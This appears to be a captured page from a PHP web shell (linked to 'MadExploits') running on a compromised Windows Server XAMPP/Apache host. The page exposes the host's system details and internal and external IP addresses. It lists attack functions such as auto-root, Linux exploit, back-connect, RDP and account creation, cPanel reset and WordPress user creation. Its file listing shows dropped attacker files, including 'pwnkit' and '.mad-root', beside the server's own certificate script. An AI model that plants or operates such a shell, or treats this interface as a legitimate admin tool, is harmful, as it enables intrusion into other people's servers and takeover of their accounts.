Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.140.185.250
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
apache /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxrwxrwx
conf
[ DIR ]
drwxrwxrwx
error
[ DIR ]
drwxrwxrwx
icons
[ DIR ]
drwxrwxrwx
include
[ DIR ]
drwxrwxrwx
lib
[ DIR ]
drwxrwxrwx
logs
[ DIR ]
drwxrwxrwx
manual
[ DIR ]
drwxrwxrwx
modules
[ DIR ]
drwxrwxrwx
scripts
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
ABOUT_APACHE.txt
13.42
KB
-rw-rw-rw-
CHANGES.txt
59
B
-rw-rw-rw-
INSTALL.txt
310
B
-rw-rw-rw-
LICENSE.txt
43.45
KB
-rw-rw-rw-
NOTICE.txt
2.8
KB
-rw-rw-rw-
README.txt
4.65
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
apache_installservice.bat
305
B
-rwxrwxrwx
apache_uninstallservice.bat
352
B
-rwxrwxrwx
makecert.bat
543
B
-rwxrwxrwx
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : makecert.bat
@echo off set OPENSSL_CONF=./conf/openssl.cnf if not exist .\conf\ssl.crt mkdir .\conf\ssl.crt if not exist .\conf\ssl.key mkdir .\conf\ssl.key bin\openssl req -new -out server.csr bin\openssl rsa -in privkey.pem -out server.key bin\openssl x509 -in server.csr -out server.crt -req -signkey server.key -days 365 set OPENSSL_CONF= del .rnd del privkey.pem del server.csr move /y server.crt .\conf\ssl.crt move /y server.key .\conf\ssl.key echo. echo ----- echo Das Zertifikat wurde erstellt. echo The certificate was provided. echo. pause
Close